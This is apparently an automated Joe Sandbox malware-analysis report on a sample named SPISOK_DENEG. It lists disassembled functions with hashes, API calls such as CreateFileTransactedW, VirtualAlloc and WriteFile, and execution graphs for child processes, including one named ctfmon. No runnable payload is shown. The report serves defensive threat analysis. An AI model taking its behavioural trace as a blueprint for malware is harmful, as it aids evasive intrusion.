                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 5fe722c05cdc0dcf634d4694f04cfe14834bbc4b1754a5d1f444ae51d81a9f76
                                                            • Instruction ID: a91c32f25078959a8613fd2743f683594ca1b74d55577aed5014f17c3a0ef02b
                                                            • Opcode Fuzzy Hash: 5fe722c05cdc0dcf634d4694f04cfe14834bbc4b1754a5d1f444ae51d81a9f76
                                                            • Instruction Fuzzy Hash: A6417071804658A9EB35EB64DC59EEEB37CAF55300F0040A7B609A2293EB745F85CF71
                                                            Function 000EB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: bfd1885096d29489c5f713cdd1e8d41a3b5099d985a0b0f1ea0c4a40d6729413
                                                            • Instruction ID: 0d8adedfc36c20e19f67eef14b598fcbf358a105fbccf01bc3a49434a38db4b3
                                                            • Opcode Fuzzy Hash: bfd1885096d29489c5f713cdd1e8d41a3b5099d985a0b0f1ea0c4a40d6729413
                                                            • Instruction Fuzzy Hash: DE21087390578A5ED731EA65D845FBBB3ECDF50750F10042AF640E3142EB65DE4893A2
                                                            Function 000DF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000DF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000DF2E4
                                                              • Part of subcall function 000DF2C5: GetProcAddress.KERNEL32(001181C8,CryptUnprotectMemory), ref: 000DF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,000DF33E), ref: 000DF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 000DF389
                                                            • CryptUnprotectMemory failed, xrefs: 000DF3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 61c58150231d2d1e066fe26f9d97d30db395e03726fc96de734afdba614c2dfd
                                                            • Instruction ID: 3bf520d5e0f2f340e4d23b2da6224bfb78d6b0d5e96ae0a278a632f1abf7c199
                                                            • Opcode Fuzzy Hash: 61c58150231d2d1e066fe26f9d97d30db395e03726fc96de734afdba614c2dfd
                                                            • Instruction Fuzzy Hash: B811B431A0532AABDB156F20DD456BE3798FF04760B05C127FC525B392DB709F4186A0
                                                            Function 000DB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 000DB9B8
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: d4d55ed3f7b1ced72e3817a263ac6aa9b2803dffc555364feffdba09236f4c64
                                                            • Instruction ID: b0921349c8c7e72dd8ab38c2571aec2aa3891d43fbbe9c1cd8189bcd0187eeb3
                                                            • Opcode Fuzzy Hash: d4d55ed3f7b1ced72e3817a263ac6aa9b2803dffc555364feffdba09236f4c64
                                                            • Instruction Fuzzy Hash: E001F563500312B9DA706B398C42DBBB7ECEF957B0B55450BF644D6683EB30D84082B2
                                                            Function 000E101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,000E1160,?,00000000,00000000), ref: 000E1043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 000E108A
                                                              • Part of subcall function 000D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D6C54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: 3689b8dca67fd1207ba033ba8355ae8a5802c5124faa2735dc8a6e1edf188f8b
                                                            • Instruction ID: 7a2dba2470977e294636d5239b16a9fe80a7e72be6b41ef2feadf12da73ee213
                                                            • Opcode Fuzzy Hash: 3689b8dca67fd1207ba033ba8355ae8a5802c5124faa2735dc8a6e1edf188f8b
                                                            • Instruction Fuzzy Hash: 7A0126B534034DBFD3346F25AC51BFAB399EB84350F20002EF686662C1CAF168C48230
                                                            Function 000D1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000DE2E8: _swprintf.LIBCMT ref: 000DE30E
                                                              • Part of subcall function 000DE2E8: _strlen.LIBCMT ref: 000DE32F
                                                              • Part of subcall function 000DE2E8: SetDlgItemTextW.USER32(?,0010E274,?), ref: 000DE38F
                                                              • Part of subcall function 000DE2E8: GetWindowRect.USER32(?,?), ref: 000DE3C9
                                                              • Part of subcall function 000DE2E8: GetClientRect.USER32(?,?), ref: 000DE3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                            • SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: c1bb83b40acee9c8b44ec71bacd51b9f650a7f27bcd425e1f319b0c0ec3be635
                                                            • Instruction ID: c9ad035971c550b35ceb9d9ea5f49350f05157a42274b4cdf042b1dbc90b3f08
                                                            • Opcode Fuzzy Hash: c1bb83b40acee9c8b44ec71bacd51b9f650a7f27bcd425e1f319b0c0ec3be635
                                                            • Instruction Fuzzy Hash: 6EF04F3010438CBADF555F61CC0DBEA3B99AF44345F088116FD9455AE1CF78CAD0EA60
                                                            Function 000E0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,000E1206,?), ref: 000E0FEA
                                                            • GetLastError.KERNEL32(?), ref: 000E0FF6
                                                              • Part of subcall function 000D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 000E0FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: ebd61d762bf58dcc6edaa4e4ff3815de1bf550febfa90d431b9165d03ad9ee9a
                                                            • Instruction ID: 1bf99437cd0d03ad4588cec23cdd5e9fa5dba85eab52a5c157370e7f0f53f7b8
                                                            • Opcode Fuzzy Hash: ebd61d762bf58dcc6edaa4e4ff3815de1bf550febfa90d431b9165d03ad9ee9a
                                                            • Instruction Fuzzy Hash: 73D02B715052307BC61033245D05DFE78089B12331F504715F178643E6CB6109C142A1
                                                            Function 000DE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,000DDA55,?), ref: 000DE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,000DDA55,?), ref: 000DE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: 42077494628b4eb589390538c8d7eff03e461f6073ac2e038b8e13ed31065628
                                                            • Instruction ID: 361d9c1de5716eba59c6998ea3ea6cd65fb244953207c6dec65d33e7f562d0eb
                                                            • Opcode Fuzzy Hash: 42077494628b4eb589390538c8d7eff03e461f6073ac2e038b8e13ed31065628
                                                            • Instruction Fuzzy Hash: C2C01231242750A6EA302766AC4DB836A9C5B00B51F090449B2D1EA6D9DAE5C98086A0

                                                            Execution Graph

                                                            Execution Coverage:13.8%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:24
                                                            Total number of Limit Nodes:2
                                                            execution_graph 13673 7ffd9ba09edd 13674 7ffd9ba09eff WriteFile 13673->13674 13676 7ffd9ba09fc7 13674->13676 13669 7ffd9ba09d6e 13670 7ffd9ba09d7d CreateFileTransactedW 13669->13670 13672 7ffd9ba09eaa 13670->13672 13677 7ffd9ba0a0e1 13678 7ffd9ba0a0eb 13677->13678 13681 7ffd9ba0a177 13678->13681 13682 7ffd9ba08db8 13678->13682 13680 7ffd9ba0a16b 13684 7ffd9ba0a930 13682->13684 13683 7ffd9ba0a9e9 13683->13680 13684->13683 13686 7ffd9ba08b98 13684->13686 13688 7ffd9ba0aca0 13686->13688 13687 7ffd9ba0ada3 13687->13683 13688->13687 13689 7ffd9ba0af73 GetSystemInfo 13688->13689 13690 7ffd9ba0afae 13689->13690 13690->13683 13695 7ffd9bb7727d 13696 7ffd9bb77283 QueryFullProcessImageNameA 13695->13696 13698 7ffd9bb77444 13696->13698 13691 7ffd9ba0b1d4 13692 7ffd9ba0b1dd VirtualAlloc 13691->13692 13694 7ffd9ba0b298 13692->13694

                                                            Executed Functions

                                                            Function 00007FFD9BA08B98 Relevance: 1.9, APIs: 1, Instructions: 410COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 714 7ffd9ba08b98-7ffd9ba0acb3 716 7ffd9ba0acfd-7ffd9ba0ad0a 714->716 717 7ffd9ba0acb5-7ffd9ba0acd7 714->717 718 7ffd9ba0ad1a-7ffd9ba0ad20 716->718 719 7ffd9ba0ad0c-7ffd9ba0ad15 716->719 720 7ffd9ba0ad30-7ffd9ba0ad5a 717->720 721 7ffd9ba0acd9-7ffd9ba0acdc 717->721 723 7ffd9ba0ad22-7ffd9ba0ad23 718->723 724 7ffd9ba0ad25 718->724 719->718 722 7ffd9ba0ad17-7ffd9ba0ad18 719->722 725 7ffd9ba0ad5c 720->725 726 7ffd9ba0ad5d-7ffd9ba0ad60 721->726 727 7ffd9ba0acde-7ffd9ba0ace0 721->727 722->718 723->724 728 7ffd9ba0ad2b-7ffd9ba0ad2e 724->728 725->726 729 7ffd9ba0ad62-7ffd9ba0ad69 726->729 727->725 730 7ffd9ba0ace2 727->730 728->720 731 7ffd9ba0ad6c-7ffd9ba0ad6e 729->731 730->724 732 7ffd9ba0ace4-7ffd9ba0ace6 730->732 733 7ffd9ba0ad70-7ffd9ba0ad7b 731->733 734 7ffd9ba0ad94-7ffd9ba0ad9f 731->734 732->729 735 7ffd9ba0ace8 732->735 737 7ffd9ba0ad89-7ffd9ba0ad8f 733->737 738 7ffd9ba0ad7c-7ffd9ba0ad80 733->738 734->731 740 7ffd9ba0ada1-7ffd9ba0adab 734->740 735->728 739 7ffd9ba0acea-7ffd9ba0acfb call 7ffd9ba08cd8 735->739 737->734 738->737 741 7ffd9ba0ad82-7ffd9ba0ad87 738->741 739->716 747 7ffd9ba0adec-7ffd9ba0adef 740->747 741->737 743 7ffd9ba0ada3-7ffd9ba0aebf 741->743 748 7ffd9ba0adad-7ffd9ba0adbb call 7ffd9ba08ba0 747->748 749 7ffd9ba0adf1 747->749 754 7ffd9ba0adc0-7ffd9ba0adc6 748->754 751 7ffd9ba0ae11-7ffd9ba0ae14 749->751 752 7ffd9ba0ae7f-7ffd9ba0ae82 751->752 753 7ffd9ba0ae16-7ffd9ba0ae19 751->753 757 7ffd9ba0aec0-7ffd9ba0aecc 752->757 758 7ffd9ba0ae84-7ffd9ba0aeaa 752->758 755 7ffd9ba0ae5a-7ffd9ba0ae5d 753->755 754->751 756 7ffd9ba0adc8-7ffd9ba0adea call 7ffd9ba08cf8 754->756 760 7ffd9ba0ae5f 755->760 761 7ffd9ba0ae1b-7ffd9ba0ae34 call 7ffd9ba08ba8 755->761 756->747 771 7ffd9ba0adf3-7ffd9ba0ae0f 756->771 763 7ffd9ba0aece-7ffd9ba0af09 757->763 764 7ffd9ba0af1b-7ffd9ba0afac GetSystemInfo 757->764 760->752 761->752 772 7ffd9ba0ae36-7ffd9ba0ae58 call 7ffd9ba08cf8 761->772 783 7ffd9ba0af11-7ffd9ba0af1a 763->783 784 7ffd9ba0af0b-7ffd9ba0af0f 763->784 781 7ffd9ba0afae 764->781 782 7ffd9ba0afb4-7ffd9ba0afd5 764->782 771->751 772->755 780 7ffd9ba0ae61-7ffd9ba0ae7d 772->780 780->752 781->782 783->764 784->783
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: db693d58fd53a3edad99f78d7300ad288c0950163b9e3daca03d1e1c59b517eb
                                                            • Instruction ID: a4f0076cf48a6d87dd7c226371d181ed6a5a52bab48db3944422e2fe0a1a3e45
                                                            • Opcode Fuzzy Hash: db693d58fd53a3edad99f78d7300ad288c0950163b9e3daca03d1e1c59b517eb
                                                            • Instruction Fuzzy Hash: 27C13531B0DE0D4FE768D75CD4656B977E1EB9A320F05427ED08EC32B2DDA9A9028781
                                                            Function 00007FFD9BB7727D Relevance: 1.8, APIs: 1, Instructions: 259COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1814876455.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bb70000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: FullImageNameProcessQuery
                                                            • String ID:
                                                            • API String ID: 3578328331-0
                                                            • Opcode ID: 193c8ce99d5128a697679c4f77eb5abe7caa3ee621030492c8fad593be02132a
                                                            • Instruction ID: 488d369b918afb187438331073995d478a0ec355f192a8c74d2e88f6e8ae17fe
                                                            • Opcode Fuzzy Hash: 193c8ce99d5128a697679c4f77eb5abe7caa3ee621030492c8fad593be02132a
                                                            • Instruction Fuzzy Hash: 4481D231608A8D8FDB68DF28C8957F937E1FB59315F10427EE84EC7292CB74A9418B81
                                                            Function 00007FFD9BA09D6E Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 816 7ffd9ba09d6e-7ffd9ba09d7b 817 7ffd9ba09d7d-7ffd9ba09d85 816->817 818 7ffd9ba09d86-7ffd9ba09e22 816->818 817->818 822 7ffd9ba09e24-7ffd9ba09e29 818->822 823 7ffd9ba09e2c-7ffd9ba09ea8 CreateFileTransactedW 818->823 822->823 824 7ffd9ba09eb0-7ffd9ba09eda 823->824 825 7ffd9ba09eaa 823->825 825->824
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: CreateFileTransacted
                                                            • String ID:
                                                            • API String ID: 2149338676-0
                                                            • Opcode ID: f5fba847d123d82373bfc8ef1bdbfff3c21856b086d5bfd87f7783db28a81781
                                                            • Instruction ID: ce04ddacc13e274a29f37a34ffb4e0213cf6ee3ab80b52a5179760cdf7905d48
                                                            • Opcode Fuzzy Hash: f5fba847d123d82373bfc8ef1bdbfff3c21856b086d5bfd87f7783db28a81781
                                                            • Instruction Fuzzy Hash: AC51F83090DB888FDB55DF5CD855AA97BF0EF6A320F14429FE089D3252C775A845C782
                                                            Function 00007FFD9BA09EDD Relevance: 1.6, APIs: 1, Instructions: 132fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 827 7ffd9ba09edd-7ffd9ba09f71 831 7ffd9ba09f73-7ffd9ba09f78 827->831 832 7ffd9ba09f7b-7ffd9ba09fc5 WriteFile 827->832 831->832 833 7ffd9ba09fcd-7ffd9ba09ff5 832->833 834 7ffd9ba09fc7 832->834 834->833
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: e59cd9f01e76e2421326a7235b7bf131f754713e0b9573d3186325ea6faedc91
                                                            • Instruction ID: 6061d15345e40c5a7396260fb7c42167cb75b115cf05ac2048c22e3145cb8f30
                                                            • Opcode Fuzzy Hash: e59cd9f01e76e2421326a7235b7bf131f754713e0b9573d3186325ea6faedc91
                                                            • Instruction Fuzzy Hash: B841B13190CA4C8FDB58DF58D8596B9BBF1FB99311F04826FD049D3292CB75A845CB81
                                                            Function 00007FFD9BA0AF18 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 835 7ffd9ba0af18-7ffd9ba0af6b 839 7ffd9ba0af73-7ffd9ba0afac GetSystemInfo 835->839 840 7ffd9ba0afae 839->840 841 7ffd9ba0afb4-7ffd9ba0afd5 839->841 840->841
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: bc6df7009d8d6592cd7d3c350ee64d4ecb59f3b1116017453c2ad78183ef039f
                                                            • Instruction ID: 9881862933b5deda37bb52bf67c6de1ad4c564ecfce325aba9e255cc990f9946
                                                            • Opcode Fuzzy Hash: bc6df7009d8d6592cd7d3c350ee64d4ecb59f3b1116017453c2ad78183ef039f
                                                            • Instruction Fuzzy Hash: 13219C71A08A0C9FDB58EB98C849AE9BBF1FB95311F00422ED04AD3261DB7168568B80
                                                            Function 00007FFD9BA0B1D4 Relevance: 1.4, APIs: 1, Instructions: 121memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 941 7ffd9ba0b1d4-7ffd9ba0b1db 942 7ffd9ba0b1dd-7ffd9ba0b1e5 941->942 943 7ffd9ba0b1e6-7ffd9ba0b296 VirtualAlloc 941->943 942->943 947 7ffd9ba0b29e-7ffd9ba0b2c6 943->947 948 7ffd9ba0b298 943->948 948->947
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1813309860.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9ba00000_ChainPortsurrogate.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 809c19fadd9e3785e7a309e7909803191bcb0504fbc603b9aa5c83350aafa2f8
                                                            • Instruction ID: bcb01a55c26e8e45cfb6f4fc74c835c169402b64248a07b3ce6ee17248af39b7
                                                            • Opcode Fuzzy Hash: 809c19fadd9e3785e7a309e7909803191bcb0504fbc603b9aa5c83350aafa2f8
                                                            • Instruction Fuzzy Hash: A4310B31A0CA4C4FDB18EB6C98466F97BF1EB56321F04426FD05DD3192DE756816C781

                                                            Executed Functions

                                                            Function 00007FFD9BA01222 Relevance: .4, Instructions: 391COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b0dabde63694ffb86f1afed21fa20f12ce67f85b909b7b237b086b3f7b391eb
                                                            • Instruction ID: 52a29170bf02ec3f1396f7ce4a949d8bc3867589c3707990084dda4208d7b923
                                                            • Opcode Fuzzy Hash: 2b0dabde63694ffb86f1afed21fa20f12ce67f85b909b7b237b086b3f7b391eb
                                                            • Instruction Fuzzy Hash: E7C15A20B0E68A0FE769AB7884652F57BD1EF67310F1640BEE4CAC71E7DD5DA8428341
                                                            Function 00007FFD9BA0276D Relevance: .7, Instructions: 680COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1857347262.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9ba00000_ctfmon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d1323b155d438f900c06c75d2f073cd46b39e502d4e267a6f48e73cae1c3c934
                                                            • Instruction ID: 9342ff7c5743816385795b7b0566ac32f60e4bcc76655490e9786c5cf6351728
                                                            • Opcode Fuzzy Hash: d1323b155d438f900c06c75d2f073cd46b39e502d4e267a6f48e73cae1c3c934
